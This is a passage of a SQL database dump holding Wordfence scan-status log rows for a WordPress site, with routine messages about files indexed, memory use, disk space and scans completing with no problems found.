(15608, 1711384953.656285, 2, 'info', 'Analyzed 1400 files containing 27.01 MB of data so far'),
(16566, 1712681611.108693, 2, 'info', 'Wordfence used 18.11 MB of memory for scan. Server peak memory usage was: 91.61 MB'),
(16292, 1712422388.186813, 2, 'info', '5500 files indexed'),
(16290, 1712422388.134423, 2, 'info', '4500 files indexed'),
(16291, 1712422388.158751, 2, 'info', '5000 files indexed'),
(15757, 1711645529.948053, 2, 'info', '500 files indexed'),
(16145, 1712162958.554701, 2, 'info', 'Analyzed 2500 files containing 41.86 MB of data so far'),
(16144, 1712162958.468432, 2, 'info', 'Analyzed 2400 files containing 41.21 MB of data so far'),
(15726, 1711645519.289699, 1, 'info', 'Contacting Wordfence to initiate scan'),
(15440, 1711128794.081211, 2, 'info', 'Analyzed 1900 files containing 29.33 MB of data so far'),
(16433, 1712681580.019606, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.64 TB'),
(15789, 1711645538.252999, 2, 'info', 'Analyzed 2100 files containing 30.11 MB of data so far'),
(16138, 1712162957.189228, 2, 'info', 'Analyzed 1800 files containing 28.74 MB of data so far'),
(16139, 1712162957.276990, 2, 'info', 'Analyzed 1900 files containing 29.33 MB of data so far'),
(15528, 1711172740.692755, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(15978, 1711903803.220714, 2, 'info', 'Analyzed 3200 files containing 61.59 MB of data so far'),
(15840, 1711645561.338329, 2, 'info', 'Scanned contents of 45 additional files at 4.52 per second'),
(15839, 1711645560.293322, 2, 'info', 'Scanned contents of 42 additional files at 4.72 per second'),
(15418, 1711128790.778643, 2, 'info', '4500 files indexed'),
(16122, 1712162954.270922, 2, 'info', 'Analyzed 200 files containing 2.37 MB of data so far'),
(15285, 1710867658.685583, 2, 'info', 'Analyzed 3700 files containing 69 MB of data so far'),
(15286, 1710867658.873391, 2, 'info', 'Analyzed 3800 files containing 70.34 MB of data so far'),
(15883, 1711772722.496319, 1, 'info', 'Initiating quick scan'),
(16281, 1712422387.436979, 10, 'info', 'SUM_START:Scanning for unknown files in wp-admin and wp-includes'),
(16123, 1712162954.437517, 2, 'info', 'Analyzed 300 files containing 3.61 MB of data so far'),
(15273, 1710867653.412465, 2, 'info', 'Analyzed 2500 files containing 42.02 MB of data so far'),
(16268, 1712422386.626592, 2, 'info', 'Found 6 plugins'),
(16267, 1712422386.623887, 2, 'info', 'Getting plugin list from WordPress'),
(15777, 1711645533.220890, 2, 'info', 'Analyzed 900 files containing 17.82 MB of data so far'),
(15664, 1711384972.743356, 2, 'info', 'Scanned contents of 52 additional files at 12.54 per second'),
(16212, 1712162973.681860, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(16462, 1712681580.742964, 2, 'info', '3000 files indexed'),
(15691, 1711384975.002612, 2, 'info', 'Wordfence used 16.5 MB of memory for scan. Server peak memory usage was: 85 MB'),
(15996, 1711903809.859779, 2, 'info', 'Analyzed 5000 files containing 82.04 MB of data so far'),
(16246, 1712376298.774679, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(16247, 1712376298.777862, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16308, 1712422397.705880, 2, 'info', 'Analyzed 1500 files containing 26.93 MB of data so far'),
(16307, 1712422397.591859, 2, 'info', 'Analyzed 1400 files containing 26.16 MB of data so far'),
(15514, 1711128809.402852, 2, 'info', 'Done examining URLs'),
(15343, 1710867669.780152, 1, 'info', '-------------------'),
(15344, 1710867669.780985, 2, 'info', 'Wordfence used 16.5 MB of memory for scan. Server peak memory usage was: 85 MB'),
(16012, 1711903814.538538, 2, 'info', 'Starting scan of file contents'),
(15429, 1711128792.591419, 2, 'info', 'Analyzed 800 files containing 17.23 MB of data so far'),
(15428, 1711128792.489208, 2, 'info', 'Analyzed 700 files containing 16.81 MB of data so far'),
(16364, 1712422423.216968, 2, 'info', 'Scanned contents of 25 additional files at 4.74 per second'),
(16363, 1712422423.053213, 2, 'info', 'Scanned contents of 23 additional files at 4.50 per second'),
(16360, 1712422419.004008, 2, 'info', 'Scanned contents of 7 additional files at 6.62 per second'),
(16361, 1712422420.328182, 2, 'info', 'Scanned contents of 16 additional files at 6.72 per second'),
(16362, 1712422421.549407, 2, 'info', 'Scanned contents of 19 additional files at 5.27 per second'),
(15742, 1711645529.230824, 2, 'info', 'Getting plugin list from WordPress'),
(16437, 1712681580.035816, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(16436, 1712681580.032681, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(15983, 1711903807.825439, 2, 'info', 'Analyzed 3700 files containing 68.95 MB of data so far'),
(16448, 1712681580.602779, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(15443, 1711128794.643604, 2, 'info', 'Analyzed 2200 files containing 33.27 MB of data so far'),
(15444, 1711128794.927368, 2, 'info', 'Analyzed 2300 files containing 36.48 MB of data so far'),
(15445, 1711128795.294187, 2, 'info', 'Analyzed 2400 files containing 41.56 MB of data so far'),
(15446, 1711128795.361385, 2, 'info', 'Analyzed 2500 files containing 42.04 MB of data so far'),
(15447, 1711128795.442321, 2, 'info', 'Analyzed 2600 files containing 42.99 MB of data so far'),
(15456, 1711128797.782691, 2, 'info', 'Analyzed 3500 files containing 66.87 MB of data so far'),
(16405, 1712552811.909117, 1, 'info', 'Initiating quick scan'),
(16406, 1712552811.942070, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(15395, 1711128789.677102, 2, 'info', 'Getting plugin list from WordPress'),
(15396, 1711128789.678628, 2, 'info', 'Found 6 plugins'),
(15397, 1711128789.678813, 2, 'info', 'Getting theme list from WordPress'),
(15270, 1710867652.570009, 2, 'info', 'Analyzed 2200 files containing 33.24 MB of data so far'),
(15269, 1710867652.231303, 2, 'info', 'Analyzed 2100 files containing 30.09 MB of data so far'),
(16156, 1712162961.119536, 2, 'info', 'Analyzed 3600 files containing 68.02 MB of data so far'),
(15634, 1711384962.072393, 2, 'info', 'Analyzed 4000 files containing 71.42 MB of data so far'),
(16064, 1712033088.878228, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16136, 1712162957.078928, 2, 'info', 'Analyzed 1600 files containing 28.08 MB of data so far'),
(15641, 1711384963.004481, 2, 'info', 'Analyzed 4700 files containing 75.86 MB of data so far'),
(16019, 1711903818.810434, 2, 'info', 'Done host key check.'),
(15667, 1711384972.998050, 2, 'info', 'Done host key check.'),
(15668, 1711384973.007390, 2, 'info', 'Done file contents scan'),
(15666, 1711384972.746206, 2, 'info', 'Checking 234 host keys against Wordfence scanning servers.'),
(16338, 1712422406.637591, 2, 'info', 'Analyzed 4500 files containing 72.28 MB of data so far'),
(16003, 1711903813.380473, 2, 'info', 'Analyzed 5700 files containing 113.43 MB of data so far'),
(15619, 1711384955.810526, 2, 'info', 'Analyzed 2500 files containing 42.04 MB of data so far'),
(15365, 1710996364.233169, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(15780, 1711645534.065801, 2, 'info', 'Analyzed 1200 files containing 22.05 MB of data so far'),
(15781, 1711645534.626856, 2, 'info', 'Analyzed 1300 files containing 26.68 MB of data so far'),
(15722, 1711599503.912715, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(15363, 1710996364.227878, 1, 'info', '-------------------'),
(15364, 1710996364.228808, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(15621, 1711384956.211813, 2, 'info', 'Analyzed 2700 files containing 44.2 MB of data so far'),
(15620, 1711384956.069467, 2, 'info', 'Analyzed 2600 files containing 42.99 MB of data so far'),
(16137, 1712162957.129290, 2, 'info', 'Analyzed 1700 files containing 28.51 MB of data so far'),
(16492, 1712681585.714340, 2, 'info', 'Analyzed 2400 files containing 41.22 MB of data so far'),
(16493, 1712681585.810264, 2, 'info', 'Analyzed 2500 files containing 41.72 MB of data so far'),
(16494, 1712681585.908726, 2, 'info', 'Analyzed 2600 files containing 43 MB of data so far'),
(16495, 1712681585.996564, 2, 'info', 'Analyzed 2700 files containing 43.96 MB of data so far'),
(15261, 1710867651.588454, 2, 'info', 'Analyzed 1300 files containing 26.66 MB of data so far'),
(16568, 1712681611.110193, 10, 'info', 'SUM_FINAL:Scan complete. Congratulations, no new problems found.'),
(15274, 1710867653.518862, 2, 'info', 'Analyzed 2600 files containing 42.97 MB of data so far'),
(15275, 1710867653.660982, 2, 'info', 'Analyzed 2700 files containing 44.18 MB of data so far'),
(16499, 1712681587.484577, 2, 'info', 'Analyzed 3100 files containing 59.85 MB of data so far'),
(16500, 1712681587.699898, 2, 'info', 'Analyzed 3200 files containing 61.58 MB of data so far'),
(16501, 1712681588.059246, 2, 'info', 'Analyzed 3300 files containing 62.76 MB of data so far'),
(16502, 1712681588.242850, 2, 'info', 'Analyzed 3400 files containing 64.06 MB of data so far'),
(15262, 1710867651.653975, 2, 'info', 'Analyzed 1400 files containing 26.99 MB of data so far'),
(16191, 1712162971.827113, 2, 'info', 'Checking 209 host keys against Wordfence scanning servers.'),
(15966, 1711903799.519766, 2, 'info', 'Analyzed 2000 files containing 29.8 MB of data so far'),
(15965, 1711903799.403361, 2, 'info', 'Analyzed 1900 files containing 29.33 MB of data so far'),
(15680, 1711384973.205770, 2, 'info', 'Starting password strength check on 2 users.'),
(15596, 1711384949.660904, 2, 'info', 'Analyzed 200 files containing 2.37 MB of data so far');
INSERT INTO `wpou_wfstatus` VALUES
(16076, 1712162942.893442, 1, 'info', 'Scheduled Wordfence scan starting at Wednesday 3rd of April 2024 04:49:02 PM'),
(16414, 1712638405.679369, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(16415, 1712638405.687134, 1, 'info', 'Initiating quick scan'),
(16416, 1712638405.689606, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(15858, 1711645562.880251, 2, 'info', 'Starting password strength check on 2 users.'),
(16270, 1712422386.643936, 2, 'info', 'Found 4 themes'),
(16269, 1712422386.626877, 2, 'info', 'Getting theme list from WordPress'),
(15792, 1711645539.664024, 2, 'info', 'Analyzed 2400 files containing 41.44 MB of data so far'),
(15791, 1711645538.950577, 2, 'info', 'Analyzed 2300 files containing 36.37 MB of data so far'),
(15790, 1711645538.635010, 2, 'info', 'Analyzed 2200 files containing 33.27 MB of data so far'),
(16497, 1712681586.794213, 2, 'info', 'Analyzed 2900 files containing 51.91 MB of data so far'),
(16496, 1712681586.174413, 2, 'info', 'Analyzed 2800 files containing 44.91 MB of data so far'),
(15808, 1711645543.582392, 2, 'info', 'Analyzed 4000 files containing 71.3 MB of data so far'),
(15807, 1711645543.472386, 2, 'info', 'Analyzed 3900 files containing 71.02 MB of data so far'),
(15798, 1711645541.301402, 2, 'info', 'Analyzed 3000 files containing 54.39 MB of data so far'),
(15386, 1711128789.649529, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.66 TB'),
(15259, 1710867650.867251, 2, 'info', 'Analyzed 1100 files containing 19.09 MB of data so far'),
(15571, 1711384948.116288, 2, 'info', 'Found 4 themes'),
(16328, 1712422404.361740, 2, 'info', 'Analyzed 3500 files containing 66.95 MB of data so far'),
(16251, 1712422376.732917, 1, 'info', 'Contacting Wordfence to initiate scan'),
(16575, 1712725023.637679, 1, 'info', '-------------------'),
(16576, 1712725023.638472, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(15865, 1711645564.643339, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15866, 1711645564.715779, 2, 'info', 'Done examining URLs'),
(15651, 1711384967.291131, 2, 'info', 'Analyzed 5700 files containing 113.53 MB of data so far'),
(15652, 1711384967.334019, 2, 'info', 'Analyzed 5741 files containing 114.23 MB of data.'),
(16274, 1712422387.371936, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(15638, 1711384962.526215, 2, 'info', 'Analyzed 4400 files containing 72.25 MB of data so far'),
(16166, 1712162964.349274, 2, 'info', 'Analyzed 4600 files containing 73.37 MB of data so far'),
(16167, 1712162964.503735, 2, 'info', 'Analyzed 4700 files containing 75.89 MB of data so far'),
(15642, 1711384963.368480, 2, 'info', 'Analyzed 4800 files containing 78.54 MB of data so far'),
(16424, 1712681571.241601, 1, 'info', 'Scheduled Wordfence scan starting at Tuesday 9th of April 2024 04:52:51 PM'),
(15448, 1711128795.535089, 2, 'info', 'Analyzed 2700 files containing 44.2 MB of data so far'),
(15449, 1711128795.682530, 2, 'info', 'Analyzed 2800 files containing 45.25 MB of data so far'),
(15248, 1710867648.614530, 2, 'info', '5741 files indexed'),
(16309, 1712422397.833995, 2, 'info', 'Analyzed 1600 files containing 27.33 MB of data so far'),
(15550, 1711384937.595389, 1, 'info', 'Scheduled Wordfence scan starting at Monday 25th of March 2024 04:42:17 PM'),
(15249, 1710867648.776406, 2, 'info', 'Analyzed 100 files containing 1.1 MB of data so far'),
(15893, 1711858490.747511, 1, 'info', 'Initiating quick scan'),
(16332, 1712422405.619476, 2, 'info', 'Analyzed 3900 files containing 71.07 MB of data so far'),
(16142, 1712162957.819931, 2, 'info', 'Analyzed 2200 files containing 33.27 MB of data so far'),
(15373, 1711082860.581389, 1, 'info', '-------------------'),
(15374, 1711082860.582127, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(16420, 1712638405.917639, 1, 'info', '-------------------'),
(16421, 1712638405.918487, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(16419, 1712638405.914879, 10, 'info', 'SUM_ENDOK:Scanning for old themes, plugins and core files'),
(15786, 1711645537.805030, 2, 'info', 'Analyzed 1800 files containing 28.74 MB of data so far'),
(15438, 1711128793.946167, 2, 'info', 'Analyzed 1700 files containing 28.51 MB of data so far'),
(15453, 1711128797.198340, 2, 'info', 'Analyzed 3200 files containing 61.7 MB of data so far'),
(15454, 1711128797.363241, 2, 'info', 'Analyzed 3300 files containing 62.98 MB of data so far'),
(16515, 1712681591.112055, 2, 'info', 'Analyzed 4700 files containing 75.89 MB of data so far'),
(16516, 1712681591.452401, 2, 'info', 'Analyzed 4800 files containing 78.49 MB of data so far'),
(15973, 1711903801.034853, 2, 'info', 'Analyzed 2700 files containing 44.1 MB of data so far'),
(15410, 1711128790.427992, 2, 'info', '500 files indexed'),
(16517, 1712681591.646365, 2, 'info', 'Analyzed 4900 files containing 80.48 MB of data so far'),
(16470, 1712681581.136972, 2, 'info', 'Analyzed 200 files containing 2.39 MB of data so far'),
(15609, 1711384953.816347, 2, 'info', 'Analyzed 1500 files containing 27.25 MB of data so far'),
(16316, 1712422399.599456, 2, 'info', 'Analyzed 2300 files containing 35.77 MB of data so far'),
(15715, 1711599503.634016, 1, 'info', 'Initiating quick scan'),
(15377, 1711128780.304373, 1, 'info', 'Scheduled Wordfence scan starting at Friday 22nd of March 2024 05:33:00 PM'),
(16498, 1712681587.074693, 2, 'info', 'Analyzed 3000 files containing 54.16 MB of data so far'),
(15804, 1711645542.982559, 2, 'info', 'Analyzed 3600 files containing 67.98 MB of data so far'),
(15805, 1711645543.131149, 2, 'info', 'Analyzed 3700 files containing 68.95 MB of data so far'),
(15458, 1711128798.101313, 2, 'info', 'Analyzed 3700 files containing 69.04 MB of data so far'),
(15457, 1711128797.957692, 2, 'info', 'Analyzed 3600 files containing 68.09 MB of data so far'),
(16503, 1712681588.526744, 2, 'info', 'Analyzed 3500 files containing 66.95 MB of data so far'),
(16504, 1712681588.669209, 2, 'info', 'Analyzed 3600 files containing 67.87 MB of data so far'),
(16412, 1712552812.288798, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(16413, 1712552812.289074, 10, 'info', 'SUM_FINAL:Scan complete. Congratulations, no new problems found.'),
(16409, 1712552812.199511, 10, 'info', 'SUM_ENDOK:Scanning for old themes, plugins and core files'),
(16410, 1712552812.204017, 1, 'info', '-------------------'),
(16411, 1712552812.287061, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(16467, 1712681580.838396, 2, 'info', '5500 files indexed'),
(15355, 1710914957.564719, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(15387, 1711128789.650025, 2, 'info', 'The disk has 1743432.26 MB available'),
(16152, 1712162960.373637, 2, 'info', 'Analyzed 3200 files containing 61.51 MB of data so far'),
(16426, 1712681573.528677, 1, 'info', 'Contacting Wordfence to initiate scan'),
(16427, 1712681573.989262, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(16249, 1712422371.090753, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 6th of April 2024 04:52:51 PM'),
(16572, 1712725023.351836, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(16573, 1712725023.357390, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(15688, 1711384974.987348, 2, 'info', 'Done examining URLs'),
(16403, 1712469388.411515, 10, 'info', 'SUM_FINAL:Scan complete. Congratulations, no new problems found.'),
(15690, 1711384975.001764, 1, 'info', '-------------------'),
(16124, 1712162955.253071, 2, 'info', 'Analyzed 400 files containing 12.04 MB of data so far'),
(16125, 1712162955.368624, 2, 'info', 'Analyzed 500 files containing 14.27 MB of data so far'),
(15419, 1711128790.808053, 2, 'info', '5000 files indexed'),
(15420, 1711128790.860570, 2, 'info', '5500 files indexed'),
(16518, 1712681591.763219, 2, 'info', 'Analyzed 5000 files containing 80.97 MB of data so far'),
(16169, 1712162964.929176, 2, 'info', 'Analyzed 4900 files containing 79.59 MB of data so far'),
(15250, 1710867648.963838, 2, 'info', 'Analyzed 200 files containing 2.36 MB of data so far'),
(16129, 1712162955.865512, 2, 'info', 'Analyzed 900 files containing 17.82 MB of data so far'),
(16128, 1712162955.776477, 2, 'info', 'Analyzed 800 files containing 17.23 MB of data so far'),
(16032, 1711903818.968898, 2, 'info', 'Starting password strength check on 2 users.'),
(16349, 1712422415.646023, 2, 'info', 'Analyzed 5600 files containing 112.27 MB of data so far'),
(16348, 1712422415.370174, 2, 'info', 'Analyzed 5500 files containing 109.73 MB of data so far'),
(16486, 1712681584.330312, 2, 'info', 'Analyzed 1800 files containing 27.95 MB of data so far'),
(16154, 1712162960.694333, 2, 'info', 'Analyzed 3400 files containing 63.93 MB of data so far'),
(16153, 1712162960.537949, 2, 'info', 'Analyzed 3300 files containing 62.84 MB of data so far'),
(15358, 1710996363.899068, 1, 'info', 'Initiating quick scan'),
(16529, 1712681599.721985, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(16020, 1711903818.830380, 2, 'info', 'Done file contents scan'),
(15959, 1711903798.978577, 2, 'info', 'Analyzed 1300 files containing 26.68 MB of data so far'),
(15960, 1711903799.041373, 2, 'info', 'Analyzed 1400 files containing 27.01 MB of data so far'),
(15961, 1711903799.135419, 2, 'info', 'Analyzed 1500 files containing 27.25 MB of data so far'),
(15263, 1710867651.745845, 2, 'info', 'Analyzed 1500 files containing 27.23 MB of data so far'),
(15283, 1710867658.374339, 2, 'info', 'Analyzed 3500 files containing 66.83 MB of data so far'),
(16344, 1712422410.334627, 2, 'info', 'Analyzed 5100 files containing 98.64 MB of data so far'),
(16149, 1712162959.450882, 2, 'info', 'Analyzed 2900 files containing 51.47 MB of data so far'),
(15559, 1711384948.054780, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.69 TB'),
(16468, 1712681580.846362, 2, 'info', '5765 files indexed'),
(16469, 1712681580.973290, 2, 'info', 'Analyzed 100 files containing 1.13 MB of data so far'),
(16475, 1712681582.569349, 2, 'info', 'Analyzed 700 files containing 15.9 MB of data so far'),
(16459, 1712681580.680265, 2, 'info', '1500 files indexed'),
(16460, 1712681580.697085, 2, 'info', '2000 files indexed'),
(16458, 1712681580.663940, 2, 'info', '1000 files indexed'),
(16457, 1712681580.647295, 2, 'info', '500 files indexed'),
(16456, 1712681580.623191, 10, 'info', 'SUM_START:Scanning for unknown files in wp-admin and wp-includes'),
(15822, 1711645548.593381, 2, 'info', 'Analyzed 5400 files containing 105.99 MB of data so far'),
(16353, 1712422416.157027, 10, 'info', 'SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),
(16354, 1712422416.165960, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(16355, 1712422416.181098, 10, 'info', 'SUM_START:Check for publicly accessible configuration files, backup files and logs'),
(16148, 1712162958.884265, 2, 'info', 'Analyzed 2800 files containing 45.08 MB of data so far'),
(16570, 1712725023.348016, 1, 'info', 'Initiating quick scan'),
(16430, 1712681579.997065, 10, 'info', 'SUM_START:Checking for the most secure way to get IPs'),
(16431, 1712681580.000546, 10, 'info', 'SUM_ENDOK:Checking for the most secure way to get IPs'),
(16428, 1712681575.990911, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(16429, 1712681577.992988, 10, 'info', 'SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),
(16147, 1712162958.739240, 2, 'info', 'Analyzed 2700 files containing 44.01 MB of data so far'),
(16146, 1712162958.639281, 2, 'info', 'Analyzed 2600 files containing 42.79 MB of data so far'),
(15793, 1711645539.882599, 2, 'info', 'Analyzed 2500 files containing 41.93 MB of data so far'),
(16057, 1712033088.585216, 1, 'info', 'Initiating quick scan'),
(16432, 1712681580.014018, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(15733, 1711645529.110014, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.67 TB'),
(15734, 1711645529.110340, 2, 'info', 'The disk has 1751358.24 MB available'),
(16376, 1712422423.547442, 10, 'info', 'SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),
(15284, 1710867658.546118, 2, 'info', 'Analyzed 3600 files containing 68.06 MB of data so far'),
(15868, 1711645564.763028, 1, 'info', '-------------------'),
(15869, 1711645564.763619, 2, 'info', 'Wordfence used 23.08 MB of memory for scan. Server peak memory usage was: 89.58 MB'),
(15788, 1711645538.125997, 2, 'info', 'Analyzed 2000 files containing 29.8 MB of data so far'),
(16337, 1712422406.502509, 2, 'info', 'Analyzed 4400 files containing 72.05 MB of data so far'),
(16121, 1712162954.114262, 2, 'info', 'Analyzed 100 files containing 1.11 MB of data so far'),
(16120, 1712162953.987450, 2, 'info', '5781 files indexed'),
(16118, 1712162953.953243, 2, 'info', '5000 files indexed'),
(16119, 1712162953.975566, 2, 'info', '5500 files indexed'),
(15583, 1711384948.876564, 2, 'info', '500 files indexed'),
(15584, 1711384948.907502, 2, 'info', '1000 files indexed'),
(15585, 1711384948.939522, 2, 'info', '1500 files indexed'),
(15586, 1711384948.971408, 2, 'info', '2000 files indexed'),
(15587, 1711384949.008104, 2, 'info', '2500 files indexed'),
(15588, 1711384949.044198, 2, 'info', '3000 files indexed'),
(15589, 1711384949.072666, 2, 'info', '3500 files indexed'),
(15590, 1711384949.094931, 2, 'info', '4000 files indexed'),
(15455, 1711128797.508938, 2, 'info', 'Analyzed 3400 files containing 63.95 MB of data so far'),
(15490, 1711128807.870115, 2, 'info', 'Scanned contents of 51 additional files at 17.39 per second'),
(15488, 1711128806.051475, 2, 'info', 'Scanned contents of 30 additional files at 26.94 per second'),
(15489, 1711128807.277973, 2, 'info', 'Scanned contents of 45 additional files at 19.23 per second'),
(15536, 1711256218.969058, 1, 'info', '-------------------'),
(15537, 1711256218.969782, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(15538, 1711256218.971133, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16317, 1712422400.162171, 2, 'info', 'Analyzed 2400 files containing 41.22 MB of data so far'),
(15991, 1711903808.847381, 2, 'info', 'Analyzed 4500 files containing 72.36 MB of data so far'),
(15546, 1711341563.119097, 1, 'info', '-------------------'),
(15899, 1711858491.136795, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 68.5 MB'),
(15900, 1711858491.138047, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(15452, 1711128796.934220, 2, 'info', 'Analyzed 3100 files containing 58.06 MB of data so far'),
(15451, 1711128796.557348, 2, 'info', 'Analyzed 3000 files containing 54.51 MB of data so far'),
(15787, 1711645537.992400, 2, 'info', 'Analyzed 1900 files containing 29.33 MB of data so far'),
(15600, 1711384951.196590, 2, 'info', 'Analyzed 600 files containing 15.54 MB of data so far'),
(16155, 1712162960.945607, 2, 'info', 'Analyzed 3500 files containing 66.88 MB of data so far'),
(16333, 1712422405.732103, 2, 'info', 'Analyzed 4000 files containing 71.19 MB of data so far'),
(15954, 1711903797.775489, 2, 'info', 'Analyzed 800 files containing 17.23 MB of data so far'),
(15955, 1711903797.875237, 2, 'info', 'Analyzed 900 files containing 17.82 MB of data so far'),
(15956, 1711903798.015472, 2, 'info', 'Analyzed 1000 files containing 18.15 MB of data so far'),
(15957, 1711903798.202690, 2, 'info', 'Analyzed 1100 files containing 19.09 MB of data so far'),
(16174, 1712162967.468583, 2, 'info', 'Analyzed 5400 files containing 106.13 MB of data so far'),
(15618, 1711384955.706508, 2, 'info', 'Analyzed 2400 files containing 41.56 MB of data so far'),
(16173, 1712162967.191368, 2, 'info', 'Analyzed 5300 files containing 103.56 MB of data so far'),
(16170, 1712162965.057389, 2, 'info', 'Analyzed 5000 files containing 80.97 MB of data so far'),
(16171, 1712162966.360875, 2, 'info', 'Analyzed 5100 files containing 95.48 MB of data so far'),
(16172, 1712162967.001326, 2, 'info', 'Analyzed 5200 files containing 102.13 MB of data so far'),
(16130, 1712162955.964330, 2, 'info', 'Analyzed 1000 files containing 18.15 MB of data so far'),
(16453, 1712681580.613239, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(16454, 1712681580.613563, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(16455, 1712681580.614942, 10, 'info', 'SUM_START:Scanning for known malware files'),
(15815, 1711645544.536244, 2, 'info', 'Analyzed 4700 files containing 75.74 MB of data so far'),
(15427, 1711128792.345554, 2, 'info', 'Analyzed 600 files containing 15.54 MB of data so far'),
(15816, 1711645544.890397, 2, 'info', 'Analyzed 4800 files containing 78.43 MB of data so far'),
(15817, 1711645545.101231, 2, 'info', 'Analyzed 4900 files containing 80.37 MB of data so far'),
(15818, 1711645545.511865, 2, 'info', 'Analyzed 5000 files containing 82.04 MB of data so far'),
(15819, 1711645547.385265, 2, 'info', 'Analyzed 5100 files containing 98.4 MB of data so far'),
(15426, 1711128792.171506, 2, 'info', 'Analyzed 500 files containing 14.27 MB of data so far'),
(15450, 1711128796.269368, 2, 'info', 'Analyzed 2900 files containing 51.93 MB of data so far'),
(16245, 1712376298.774000, 1, 'info', '-------------------'),
(15328, 1710867668.414288, 2, 'info', 'Done examining URLs'),
(15327, 1710867668.413432, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(16300, 1712422391.294332, 2, 'info', 'Analyzed 700 files containing 15.9 MB of data so far'),
(16523, 1712681597.937712, 2, 'info', 'Analyzed 5500 files containing 109.73 MB of data so far'),
(16524, 1712681598.540191, 2, 'info', 'Analyzed 5600 files containing 112.27 MB of data so far'),
(15809, 1711645543.697383, 2, 'info', 'Analyzed 4100 files containing 71.57 MB of data so far'),
(15810, 1711645543.820858, 2, 'info', 'Analyzed 4200 files containing 71.87 MB of data so far'),
(15811, 1711645543.941301, 2, 'info', 'Analyzed 4300 files containing 72.04 MB of data so far'),
(15812, 1711645544.038362, 2, 'info', 'Analyzed 4400 files containing 72.14 MB of data so far'),
(15813, 1711645544.138192, 2, 'info', 'Analyzed 4500 files containing 72.36 MB of data so far'),
(15814, 1711645544.267580, 2, 'info', 'Analyzed 4600 files containing 73.29 MB of data so far'),
(16402, 1712469388.411221, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(15687, 1711384974.986738, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15663, 1711384971.835939, 2, 'info', 'Scanned contents of 46 additional files at 14.20 per second'),
(16482, 1712681584.065256, 2, 'info', 'Analyzed 1400 files containing 26.16 MB of data so far'),
(15268, 1710867652.125533, 2, 'info', 'Analyzed 2000 files containing 29.77 MB of data so far'),
(16314, 1712422398.723217, 2, 'info', 'Analyzed 2100 files containing 29.89 MB of data so far'),
(16205, 1712162972.173332, 2, 'info', 'Starting password strength check on 2 users.'),
(15633, 1711384961.954367, 2, 'info', 'Analyzed 3900 files containing 71.13 MB of data so far'),
(15632, 1711384961.842357, 2, 'info', 'Analyzed 3800 files containing 70.38 MB of data so far'),
(15975, 1711903801.834891, 2, 'info', 'Analyzed 2900 files containing 52.16 MB of data so far'),
(15976, 1711903802.189389, 2, 'info', 'Analyzed 3000 files containing 54.39 MB of data so far'),
(16509, 1712681590.296564, 2, 'info', 'Analyzed 4100 files containing 71.46 MB of data so far'),
(16508, 1712681590.183987, 2, 'info', 'Analyzed 4000 files containing 71.19 MB of data so far'),
(15615, 1711384954.532657, 2, 'info', 'Analyzed 2100 files containing 30.11 MB of data so far'),
(15616, 1711384954.910908, 2, 'info', 'Analyzed 2200 files containing 33.27 MB of data so far'),
(15617, 1711384955.263075, 2, 'info', 'Analyzed 2300 files containing 36.48 MB of data so far'),
(16220, 1712206410.543424, 1, 'info', 'Initiating quick scan'),
(15922, 1711903794.527196, 2, 'info', 'Getting theme list from WordPress'),
(15923, 1711903794.530315, 2, 'info', 'Found 4 themes'),
(15614, 1711384954.404624, 2, 'info', 'Analyzed 2000 files containing 29.8 MB of data so far'),
(16321, 1712422400.804362, 2, 'info', 'Analyzed 2800 files containing 44.91 MB of data so far'),
(16230, 1712294462.697827, 1, 'info', 'Initiating quick scan'),
